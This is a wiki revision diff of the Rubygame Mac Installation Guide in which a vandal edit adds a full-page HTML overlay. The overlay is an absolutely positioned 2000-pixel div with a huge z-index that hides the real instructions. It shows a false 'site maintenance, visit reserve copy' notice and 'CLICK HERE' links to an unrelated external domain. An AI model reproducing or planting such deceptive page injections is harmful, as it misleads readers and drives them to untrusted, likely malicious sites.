Mac Installation Guide

From Rubygame

Jump to: navigation, search
(Easy install with Mac Pack)
Line 1: Line 1:
-
== Easy Install ==
+
>== Easy Install ==
If you have an Intel Mac (any Mac from 2007 or newer) and are using the default version of Ruby that comes with Mac OS X, try out the '''[http://blog.rubygame.org/articles/2009/10/28/rubygame-mac-pack Rubygame Mac Pack]''' for a really easy install!
If you have an Intel Mac (any Mac from 2007 or newer) and are using the default version of Ruby that comes with Mac OS X, try out the '''[http://blog.rubygame.org/articles/2009/10/28/rubygame-mac-pack Rubygame Mac Pack]''' for a really easy install!
 +
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://ujetati.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://ujetati.co.cc CLICK HERE]=
 +
----
 +
</div>
== More Difficult Install ==
== More Difficult Install ==

Revision as of 22:42, 17 November 2010

Personal tools
Namespaces
Variants
Actions
Navigation
Toolbox